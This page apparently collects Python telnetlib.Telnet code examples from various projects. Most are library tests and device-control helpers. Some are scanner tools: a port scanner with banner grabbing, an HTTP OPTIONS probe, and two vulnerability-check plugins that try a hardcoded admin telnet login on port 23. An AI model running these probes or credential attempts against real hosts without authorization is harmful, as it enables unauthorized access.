Python 类 Telnet() 的实例源码

test_telnetlib.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_very_lazy_A(self):
        # Polls read_very_lazy() by hand until EOFError and checks that the
        # pieces it returns add up to the payload that was queued for sending.
        payload = 'x' * 100
        self.dataq.put([payload, EOF_sigil])
        conn = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        # The very first call is expected to come back empty.
        self.assertEqual('', conn.read_very_lazy())
        received = ''
        while True:
            try:
                chunk = conn.read_very_lazy()
            except EOFError:
                break
            received += chunk
            if not chunk:
                # Nothing was returned: pull raw data in explicitly, check
                # the cooked queue is still empty, then process the raw
                # queue so the next call has something to hand back.
                conn.fill_rawq()
                self.assertEqual('', conn.cookedq)
                conn.process_rawq()
            # What has arrived so far must always be a prefix of the payload.
            self.assertTrue(payload.startswith(received))
        self.assertEqual(received, payload)
test_telnetlib.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def _test_command(self, data):
        """Helper: send *data* and check the IAC command seen by the callback.

        Wraps the check in its own setUp()/tearDown() pair.
        """
        self.setUp()
        self.dataq.put(data)
        conn = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        collector = nego_collector()
        conn.set_option_negotiation_callback(collector.do_nego)
        text = conn.read_all()
        seen = collector.seen
        # At least one command is expected to have been collected.
        self.assertTrue(len(seen) > 0)
        self.assertIn(seen[0], self.cmds)
        self.assertEqual(seen[1], tl.NOOPT)
        # Everything sent except the last list element must show up either
        # as returned text or as collected command data.
        sent_length = len(''.join(data[:-1]))
        self.assertEqual(sent_length, len(text + seen))
        # Break the collector => telnet reference cycle.
        collector.sb_getter = None
        self.tearDown()
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def _test_read_any_eager_A(self, func_name):
        """
        Shared check for the eager read methods.

        Looks up *func_name* on the connection and calls it repeatedly
        until EOFError, expecting the two queued text chunks back to back.
        """
        first, second = 'x' * 100, 'y' * 100
        expected = first + second
        self.dataq.put([self.block_long, first, second, EOF_sigil])
        conn = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        reader = getattr(conn, func_name)
        received = ''
        while True:
            try:
                chunk = reader()
            except EOFError:
                break
            received += chunk
            # Whatever has arrived so far must be a prefix of the full text.
            self.assertTrue(expected.startswith(received))
        self.assertEqual(expected, received)
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_lazy_A(self):
        # Polls read_lazy() by hand; whenever it comes back empty the raw
        # queue is refilled explicitly before the next attempt.
        payload = 'x' * 100
        self.dataq.put([payload, EOF_sigil])
        conn = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        # The very first call is expected to come back empty.
        self.assertEqual('', conn.read_lazy())
        received = ''
        while True:
            try:
                chunk = conn.read_lazy()
                received += chunk
                if not chunk:
                    conn.fill_rawq()
            except EOFError:
                break
            # What has arrived so far must always be a prefix of the payload.
            self.assertTrue(payload.startswith(received))
        self.assertEqual(received, payload)
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_very_lazy_A(self):
        # Drives read_very_lazy() manually until EOFError; the collected
        # output has to equal the single text chunk that was queued.
        expected = 'x' * 100
        self.dataq.put([expected, EOF_sigil])
        client = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        # Before any queue handling the call must return an empty string.
        self.assertEqual('', client.read_very_lazy())
        collected = ''
        while True:
            try:
                piece = client.read_very_lazy()
            except EOFError:
                break
            collected += piece
            if not piece:
                # Empty result: fill the raw queue, verify nothing has been
                # cooked yet, then process the raw queue for the next round.
                client.fill_rawq()
                self.assertEqual('', client.cookedq)
                client.process_rawq()
            self.assertTrue(expected.startswith(collected))
        self.assertEqual(collected, expected)
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def _test_command(self, data):
        """Helper for testing IAC + cmd.

        Performs its own setUp()/tearDown() around a single connection.
        """
        self.setUp()
        self.dataq.put(data)
        client = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        negotiator = nego_collector()
        client.set_option_negotiation_callback(negotiator.do_nego)
        plain_text = client.read_all()
        commands = negotiator.seen
        # We expect at least one command.
        self.assertTrue(len(commands) > 0)
        self.assertIn(commands[0], self.cmds)
        self.assertEqual(commands[1], tl.NOOPT)
        # Length of everything sent (minus the final list element) has to
        # match the returned text plus the collected command data.
        expected_length = len(''.join(data[:-1]))
        self.assertEqual(expected_length, len(plain_text + commands))
        # Break the negotiator => telnet reference cycle.
        negotiator.sb_getter = None
        self.tearDown()
telnet.py 文件源码 项目:actsys 作者: intel-ctrlsys 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def _establish_connection(cls, remote_access_data):
        """Open a telnet session to the remote device and log in.

        Sleeps for ``cls.SLEEP_TIME`` and then connects to
        ``remote_access_data.address`` using ``cls.TIMEOUT``. The username
        and the identifier (sent at the password prompt) are each only sent
        when the corresponding field is not the literal string ``'None'``.

        Returns the connected ``telnetlib.Telnet`` object, or ``None`` when
        the connection attempt raises ``EnvironmentError``. An exception
        raised during the login exchange is re-raised after the connection
        has been closed.
        """
        try:
            time.sleep(cls.SLEEP_TIME)
            tnet = telnetlib.Telnet(remote_access_data.address, timeout=cls.TIMEOUT)
        except EnvironmentError:
            # Could not reach the remote device.
            return None
        try:
            if remote_access_data.username != 'None':
                tnet.read_until("login:")
                tnet.write("\r\n" + remote_access_data.username + "\r\n")
            if remote_access_data.identifier != 'None':
                tnet.read_until("Password: ")
                tnet.write("\r\n" + remote_access_data.identifier + "\r\n")
                tnet.read_until(">")
        except Exception:
            # The caller never receives the connection in this case, so it
            # has to be closed here or the socket would leak.
            tnet.close()
            raise
        return tnet
telnet_scpi_client.py 文件源码 项目:mobly 作者: google 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def cmd(self, cmd_str, wait_ret=True):
        """Send one command over the telnet session and return its reply.

        Args:
            cmd_str: Command text to send; must be a ``str``.
            wait_ret: When exactly ``False``, return right after sending
                without reading a response.

        Returns:
            The decoded response with separator and prompt characters
            stripped from both ends, or ``None`` when ``wait_ret`` is
            ``False``.

        Raises:
            TypeError: If ``cmd_str`` is not a ``str``.
            attenuator.Error: If the connection is not open, or nothing
                matching the expected response pattern is received.
        """
        if not isinstance(cmd_str, str):
            raise TypeError("Invalid command string", cmd_str)
        if not self.is_open:
            raise attenuator.Error("Telnet connection not open for commands")

        # str.strip() returns a new string, so the result must be kept;
        # otherwise separators already present on the command would be
        # sent in addition to the one appended below.
        cmd_str = cmd_str.strip(self.tx_cmd_separator)
        self._tn.read_until(_ascii_string(self.prompt), 2)
        self._tn.write(_ascii_string(cmd_str + self.tx_cmd_separator))
        if wait_ret is False:
            return None

        # Raw string so that "\S" reaches the regex engine unchanged.
        match_idx, _, ret_text = self._tn.expect(
            [_ascii_string(r"\S+" + self.rx_cmd_separator)], 1)

        if match_idx == -1:
            raise attenuator.Error(
                "Telnet command failed to return valid data")

        ret_text = ret_text.decode()
        ret_text = ret_text.strip(self.tx_cmd_separator + self.rx_cmd_separator
                                  + self.prompt)

        return ret_text
connection_debug.py 文件源码 项目:fermentrack 作者: thorrak 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def test_telnet(hostname):
  """Probe a controller over telnet and report how far the exchange got.

  Connects to *hostname* with a 3 second timeout, sends ``n`` and reads
  until ``}`` (again with a 3 second timeout).

  Returns a 3-tuple:
    Initial Connection Test (bool), Version Response Test (bool),
    Version Response (whatever was read, or None when a step failed)
  """
  try:
    tn = telnetlib.Telnet(host=hostname, timeout=3)
  except socket.error:
    # socket.timeout is a subclass of socket.error, so this still covers
    # timeouts and additionally reports refused or unresolvable hosts as a
    # failed connection test instead of raising.
    return False, False, None
  try:
    tn.write("n\r\n")
    version_string = tn.read_until("}", 3)
  except Exception:
    # Best effort: any failure while talking to the controller counts as
    # "connected, but no version response".
    return True, False, None
  finally:
    # Always release the socket, whichever way the exchange ended.
    tn.close()
  return True, True, version_string


# The following was used for testing during development
test_telnetlib.py 文件源码 项目:web_ctp 作者: molebot 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def test_debuglevel_reads(self):
        # Covers the places where self.msg(...) is called while reading:
        # each case pairs the bytes fed to the connection with the debug
        # message expected to be recorded for them.
        cases = [
            # emitted by Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # emitted by Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
        ]
        for sent, expected_message in cases:
            conn = test_telnet([sent])
            conn.set_debuglevel(1)
            # Only the side effect of reading matters; the text is unused.
            conn.read_all()
            self.assertIn(expected_message, conn._messages)
run_tests.py 文件源码 项目:ospf-model-test 作者: gnakibli 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def FetchCiscoLSDB(globals):
    """Fetch and parse the OSPF database listing of every router.

    For each key in ``controlport`` a telnet session is opened to ``LXCIP``
    on that key's port and ``LoginToRouter`` is called. The "router" and
    "network" database listings are then requested, and the combined CLI
    output is printed and passed to ``ParseCLIoutput`` together with
    *globals*.

    Returns a dict mapping each ``controlport`` key to the value returned
    by ``ParseCLIoutput`` for it.
    """
    sys.stderr.write('fetch cisco LSDB')
    LSADB = {}
    for r in controlport:
        sys.stderr.write('Fetch ' + r + '\n')
        tn = telnetlib.Telnet(LXCIP, controlport[r])
        try:
            LoginToRouter(r, tn)
            pieces = []
            for lsatype in ("router", "network"):
                tn.write("show ip ospf database %s \n\r" % lsatype)
                pieces.append(tn.read_until("#"))
                # Drop anything still buffered before the next command.
                tn.read_very_eager()
        finally:
            # Release the session even when login or a read fails.
            tn.close()
        CLIoutput = "".join(pieces)
        # Single-argument print(...) produces the same output whether it is
        # parsed as a Python 2 statement or a Python 3 function call.
        print("*******************" + str(r) + "**************")
        print(CLIoutput)
        print("--------------------------------------------")
        LSADB[r] = ParseCLIoutput(CLIoutput, globals)
    return LSADB
tulpar.py 文件源码 项目:tulpar 作者: anilbaranyelken 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def portScanner(url,dosyaAdi):
    """Scan a port range on *url* and append the findings to a report file.

    Prompts for a start and a finish port and tries every port in
    ``range(start, finish)`` (the finish port itself is not tried). For each
    port that accepts a connection and answers with at least one line, the
    first line of the answer is printed and collected. The collected lines
    are appended to the file *dosyaAdi*.
    """
    baslangic = int(raw_input("Start port: "))
    bitis = int(raw_input("Finish port: "))
    report_lines = []
    for port in range(baslangic, bitis):
        try:
            baglanti = telnetlib.Telnet(url, port)
        except Exception:
            # Port could not be connected to; move on to the next one.
            continue
        try:
            baglanti.write("\n")
            # Read the answer once and reuse it for both the console and the
            # report. NOTE(review): read_all() blocks until the peer closes
            # the connection; consider a connection timeout.
            answer_lines = baglanti.read_all().splitlines()
        except Exception:
            continue
        finally:
            baglanti.close()
        if not answer_lines:
            # Connected but nothing came back: nothing to report.
            continue
        # Same text the original print statement produced for its four
        # comma-separated items.
        line = "[+] " + str(port) + "  -  " + answer_lines[0]
        print(line)
        report_lines.append(line + "\n")

    with open(dosyaAdi, "a") as rapor:
        rapor.write("".join(report_lines))
tulpar.py 文件源码 项目:tulpar 作者: anilbaranyelken 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def method(url,dosyaAdi):
    """Ask the server on *url* which HTTP methods it allows and log the answer.

    Sends an ``OPTIONS /`` request to port 80 over a raw telnet connection,
    takes the text from the first occurrence of ``Allow`` up to the next
    newline of the response, prints it and appends it to the report file
    *dosyaAdi*. Any failure is ignored (best effort), in which case nothing
    is printed or written.
    """
    try:
        telnetBaglanti = telnetlib.Telnet(url, 80)
        try:
            telnetBaglanti.write("OPTIONS / HTTP/1.1\n")
            telnetBaglanti.write("Host: " + url + "\n\n\n\n")
            sayfa = telnetBaglanti.read_all()
        finally:
            # Release the socket even when the exchange fails.
            telnetBaglanti.close()

        Metodlar = ""
        start = sayfa.find("Allow")
        if start != -1:
            end = sayfa.find("\n", start + 1)
            if end == -1:
                # No newline after the header: take everything to the end
                # rather than silently dropping the last character.
                end = len(sayfa)
            Metodlar = sayfa[start:end]

        # Same text the original two-item print statement produced.
        print("Methods:  " + Metodlar)
        with open(dosyaAdi, "a") as rapor:
            rapor.write("[+]Methods: " + Metodlar + "\n")
    except Exception:
        # Deliberately best effort: a failed probe must not stop the caller.
        pass
basic_deployment.py 文件源码 项目:charm-percona-cluster 作者: openstack 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def is_port_open(self, unit=None, port='3306', address=None):
        """Report whether a connection to *port* on the target succeeds.

        The target address is ``unit.info['public-address']`` when *unit*
        is given, otherwise *address*.

        Returns:
            True when the connection could be opened, False when opening
            it raised ``socket.error`` (host-unreachable and
            connection-refused errors are logged).

        Raises:
            Exception: If neither *unit* nor *address* is provided.
        """
        import errno

        if unit:
            addr = unit.info['public-address']
        elif address:
            addr = address
        else:
            raise Exception('Please provide a unit or address')

        try:
            conn = telnetlib.Telnet(addr, port)
        except socket.error as e:
            if e.errno == errno.EHOSTUNREACH:
                self.log.error("could not connect to %s:%s" % (addr, port))
            if e.errno == errno.ECONNREFUSED:
                self.log.error("connection refused connecting"
                               " to %s:%s" % (addr,
                                              port))
            return False
        # The connection is only a reachability probe; close it right away
        # so repeated checks do not leak sockets.
        conn.close()
        return True
netio_kshell.py 文件源码 项目:labgrid 作者: labgrid-project 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def get(host, index):
    """Return whether port *index* of the device at *host* reports state 1.

    Connects to TCP port 1234 of *host*, logs in, sends ``port <index>`` and
    parses the digit following ``250`` in the reply.

    Args:
        host: Host name or address to connect to.
        index: Port number, convertible to int and within 1..4.

    Returns:
        True when the reported digit is ``1``, otherwise False.

    Raises:
        Exception: If the reply does not match the expected pattern.
    """
    index = int(index)
    assert 1 <= index <= 4
    tn = telnetlib.Telnet(host, 1234, 1)
    try:
        tn.read_until(b"\r\n", 0.5)
        tn.write(b"login admin admin\n")
        tn.read_until(b"250 OK\r\n", 0.5)
        tn.write("port {}\n".format(index).encode())
        read = tn.read_until(b"\r\n", 0.5)
        # Raw string so that "\d" reaches the regex engine unchanged.
        m = re.match(r".*250 (\d).*", read.decode())
        if m is None:
            raise Exception("NetIO: could not match response")
        tn.write(b"quit\n")
    finally:
        # Close the connection on the error path as well.
        tn.close()
    return m.group(1) == "1"
exp?2089.py 文件源码 项目:AnyScan 作者: zhangzhenfeng 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def audit(arg):
    """Probe the telnet service on *arg* with fixed credentials.

    Connects to port 23 with a 5 second timeout, sends the user name, waits
    for ``password: ``, sends the password, waits for the ``->`` prompt,
    sends ``?`` and reads up to the next ``->``. When that reply contains
    ``exec``, ``security_hole(arg)`` is called and *arg* is returned.

    Returns *arg* on a hit, otherwise None. All errors are ignored.
    """
    port = 23
    timeout = 5
    user = 'admin'
    # NOTE(review): this literal looks like a format string that was never
    # filled in -- confirm the intended password.
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg, port, timeout=timeout)
        try:
            t.write(user + '\n')
            t.read_until('password: ')
            t.write(password + '\n')
            # Skip everything up to the first prompt after logging in.
            t.read_until(finish)
            t.write("?\n")
            reply = t.read_until(finish)
        finally:
            # Release the socket even when the dialogue fails half-way.
            t.close()
        if (finish in reply) and ('exec' in reply):
            security_hole(arg)
            return arg
    except Exception:
        # Best-effort probe: an unreachable or unexpected target is not
        # treated as an error.
        pass
exp_2089.py 文件源码 项目:kekescan 作者: xiaoxiaoleo 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def audit(arg):
    """Probe the telnet service on *arg* with fixed credentials.

    Connects to port 23 with a 5 second timeout, sends the user name, waits
    for ``password: ``, sends the password, waits for the ``->`` prompt,
    sends ``?`` and reads up to the next ``->``. When that reply contains
    ``exec``, ``security_hole(arg)`` is called.

    Always returns None. All errors are ignored.
    """
    port = 23
    timeout = 5
    user = 'admin'
    # NOTE(review): this literal looks like a format string that was never
    # filled in -- confirm the intended password.
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg, port, timeout=timeout)
        try:
            t.write(user + '\n')
            t.read_until('password: ')
            t.write(password + '\n')
            # Skip everything up to the first prompt after logging in.
            t.read_until(finish)
            t.write("?\n")
            reply = t.read_until(finish)
        finally:
            # Release the socket even when the dialogue fails half-way.
            t.close()
        if (finish in reply) and ('exec' in reply):
            security_hole(arg)
    except Exception:
        # Best-effort probe: an unreachable or unexpected target is not
        # treated as an error.
        pass
test_telnetlib.py 文件源码 项目:pefile.pypy 作者: cloudtracer 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def _test_read_any_eager_A(self, func_name):
        """
        Common body for the eager-read tests.

        Fetches the method named *func_name* from the connection and keeps
        calling it until EOFError; the accumulated result has to equal the
        two queued text chunks concatenated.
        """
        chunk_x, chunk_y = 'x' * 100, 'y' * 100
        full_text = chunk_x + chunk_y
        self.dataq.put([self.block_long, chunk_x, chunk_y, EOF_sigil])
        client = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        read = getattr(client, func_name)
        collected = ''
        while True:
            try:
                piece = read()
            except EOFError:
                break
            collected += piece
            # The data gathered so far has to be a prefix of the full text.
            self.assertTrue(full_text.startswith(collected))
        self.assertEqual(full_text, collected)
test_telnetlib.py 文件源码 项目:pefile.pypy 作者: cloudtracer 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def test_read_lazy_A(self):
        # Drives read_lazy() manually until EOFError; an empty result
        # triggers an explicit refill of the raw queue.
        expected = 'x' * 100
        self.dataq.put([expected, EOF_sigil])
        client = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        # Before any refill the call must return an empty string.
        self.assertEqual('', client.read_lazy())
        collected = ''
        while True:
            try:
                piece = client.read_lazy()
                collected += piece
                if not piece:
                    client.fill_rawq()
            except EOFError:
                break
            # The data gathered so far has to be a prefix of the payload.
            self.assertTrue(expected.startswith(collected))
        self.assertEqual(collected, expected)


问题


面经


文章

微信
公众号

扫码关注公众号